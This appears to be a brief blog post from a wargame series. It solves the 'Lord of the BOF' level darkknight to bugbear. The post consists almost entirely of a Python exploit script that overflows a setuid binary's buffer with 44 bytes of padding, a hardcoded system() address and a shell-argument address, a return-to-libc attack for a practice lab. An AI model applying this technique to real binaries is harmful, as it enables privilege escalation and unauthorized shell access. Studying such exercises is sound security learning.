Wargame/Lord Of the Bof(redhat)
[Remind] LOB darkknight -> bugbear
JeonYoungSin
2019. 4. 16. 23:24
exploit.py
import os
from struct import *
p = lambda x : pack("<L" , x)
path = '/home/darkknight/bugbear'
systemAddress = p(0x40058ae0)
shellParamAddress = p(0xbffffc6d)
payload = "A"*44 + systemAddress + "BBBB" + shellParamAddress
os.execl(path,path,payload)